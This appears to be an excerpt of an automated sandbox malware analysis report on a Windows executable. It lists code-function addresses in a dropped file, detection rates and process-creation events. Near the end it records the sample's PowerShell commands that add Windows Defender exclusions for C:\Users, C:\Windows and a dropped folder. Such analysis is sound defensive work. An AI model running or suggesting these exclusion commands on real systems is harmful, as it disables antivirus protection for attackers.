Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A82115_2_0040A821
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A8C115_2_0040A8C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C8D115_2_0042C8D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040E95115_2_0040E951
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044095115_2_00440951
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040A96115_2_0040A961
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040C97115_2_0040C971
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042C9D115_2_0042C9D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004109F115_2_004109F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041299115_2_00412991
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408A4115_2_00408A41
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040AA7115_2_0040AA71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040EA1115_2_0040EA11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CA3115_2_0040CA31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CAF115_2_0040CAF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042CAA115_2_0042CAA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00410AB115_2_00410AB1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00412AB115_2_00412AB1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042CB4115_2_0042CB41
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00432B5115_2_00432B51
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040AB6115_2_0040AB61
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408B0115_2_00408B01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040EB0115_2_0040EB01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040EBC115_2_0040EBC1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408BC115_2_00408BC1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CBF115_2_0040CBF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00412B8115_2_00412B81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00410B9115_2_00410B91
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00412C5115_2_00412C51
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040AC6115_2_0040AC61
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408CE115_2_00408CE1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CD4115_2_0040CD41
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040AD5115_2_0040AD51
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00414D6115_2_00414D61
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042CD6115_2_0042CD61
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408D7115_2_00408D71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00410D1115_2_00410D11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040ED3115_2_0040ED31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040EDD115_2_0040EDD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040EE7115_2_0040EE71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040AE1115_2_0040AE11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408E1115_2_00408E11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CE3115_2_0040CE31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00410EA115_2_00410EA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00410F4115_2_00410F41
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040EF5115_2_0040EF51
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040AF5115_2_0040AF51
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00408F1115_2_00408F11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CF3115_2_0040CF31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042CFE115_2_0042CFE1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040CFF115_2_0040CFF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F05115_2_0040F051
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041107115_2_00411071
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040900115_2_00409001
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B03115_2_0040B031
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B0D115_2_0040B0D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004090E115_2_004090E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D09115_2_0040D091
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041114115_2_00411141
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D17115_2_0042D171
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F11115_2_0043F111
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F12115_2_0040F121
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044313115_2_00443131
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F1D115_2_0040F1D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004431D115_2_004431D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042B1E115_2_0042B1E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040918115_2_00409181
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D25115_2_0040D251
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041123115_2_00411231
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040923115_2_00409231
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F2C115_2_0040F2C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004112D115_2_004112D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B2E115_2_0040B2E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044329115_2_00443291
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040935115_2_00409351
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044336115_2_00443361
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B37115_2_0040B371
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D30115_2_0040D301
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F31115_2_0043F311
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042B32115_2_0042B321
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D3C115_2_0042D3C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D3D115_2_0040D3D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041338115_2_00413381
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F3B115_2_0040F3B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044343115_2_00443431
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004434F115_2_004434F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F48115_2_0043F481
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004094A115_2_004094A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B4A115_2_0040B4A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041356115_2_00413561
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040956115_2_00409561
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D50115_2_0040D501
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041151115_2_00411511
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B5E115_2_0040B5E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F59115_2_0040F591
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F59115_2_0043F591
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044359115_2_00443591
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D5B115_2_0040D5B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F65115_2_0043F651
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044367115_2_00443671
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041360115_2_00413601
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041162115_2_00411621
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F63115_2_0040F631
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D6C115_2_0042D6C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D6E115_2_0040D6E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F6F115_2_0043F6F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B68115_2_0040B681
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042B69115_2_0042B691
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004096B115_2_004096B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041174115_2_00411741
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F74115_2_0040F741
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044374115_2_00443741
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041371115_2_00413711
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B7C115_2_0040B7C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F7E115_2_0043F7E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004437E115_2_004437E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F7F115_2_0040F7F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004097B115_2_004097B1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D80115_2_0040D801
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F8C115_2_0040F8C1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004098D115_2_004098D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F8D115_2_0043F8D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040B8E115_2_0040B8E1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D8F115_2_0040D8F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042D8F115_2_0042D8F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041188115_2_00411881
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004438A115_2_004438A1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0041396115_2_00413961
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043F97115_2_0043F971
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004119D115_2_004119D1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004139F115_2_004139F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040D9F115_2_0040D9F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_004099F115_2_004099F1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040F98115_2_0040F981
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0044398115_2_00443981
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411A7115_2_00411A71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BA0115_2_0040BA01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FA0115_2_0043FA01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042DA0115_2_0042DA01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042DAC115_2_0042DAC1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BAF115_2_0040BAF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409A8115_2_00409A81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FAA115_2_0043FAA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BAA115_2_0042BAA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00413B0115_2_00413B01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DB0115_2_0040DB01
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411B3115_2_00411B31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411BD115_2_00411BD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DBD115_2_0040DBD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00413BE115_2_00413BE1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BB8115_2_0040BB81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409BA115_2_00409BA1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BBB115_2_0042BBB1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BC5115_2_0042BC51
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411C7115_2_00411C71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BC7115_2_0040BC71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040FC3115_2_0040FC31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409CC115_2_00409CC1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DC8115_2_0040DC81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FC9115_2_0043FC91
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00413D1115_2_00413D11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BD1115_2_0040BD11
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DD3115_2_0040DD31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FD3115_2_0043FD31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DDD115_2_0040DDD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FDD115_2_0043FDD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BDE115_2_0042BDE1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409DF115_2_00409DF1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00403D8115_2_00403D81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411D9115_2_00411D91
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BDB115_2_0040BDB1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0043FE6115_2_0043FE61
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00411E3115_2_00411E31
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0042BED115_2_0042BED1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BE8115_2_0040BE81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DE8115_2_0040DE81
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00447F4F15_2_00447F4F
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040BF7115_2_0040BF71
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_0040DFD115_2_0040DFD1
Source: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exeCode function: 15_2_00409FA115_2_00409FA1
Source: Joe Sandbox ViewDropped File: C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe 36A780C3CFCC5162D80BF88A5BA5F1BAC2149C1D6D3A04FF5536DECB31D494AC
Source: YYjRtxS70h.exe, 00000000.00000000.1867590904.0000000000952000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: YYjRtxS70h.exe, 00000000.00000002.3411987903.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs YYjRtxS70h.exe
Source: YYjRtxS70h.exeBinary or memory string: OriginalFilenameQwest.exe, vs YYjRtxS70h.exe
Source: classification engineClassification label: mal84.evad.winEXE@19/24@4/5
Source: C:\Users\user\Desktop\YYjRtxS70h.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYjRtxS70h.exe.logJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbsmnz2u.wnl.ps1Jump to behavior
Source: YYjRtxS70h.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: YYjRtxS70h.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\YYjRtxS70h.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: YYjRtxS70h.exeVirustotal: Detection: 62%
Source: YYjRtxS70h.exeReversingLabs: Detection: 65%
Source: unknownProcess created: C:\Users\user\Desktop\YYjRtxS70h.exe "C:\Users\user\Desktop\YYjRtxS70h.exe"
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\spxzLeEJs'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\spxzLeEJs
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
Source: C:\Users\user\Desktop\YYjRtxS70h.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
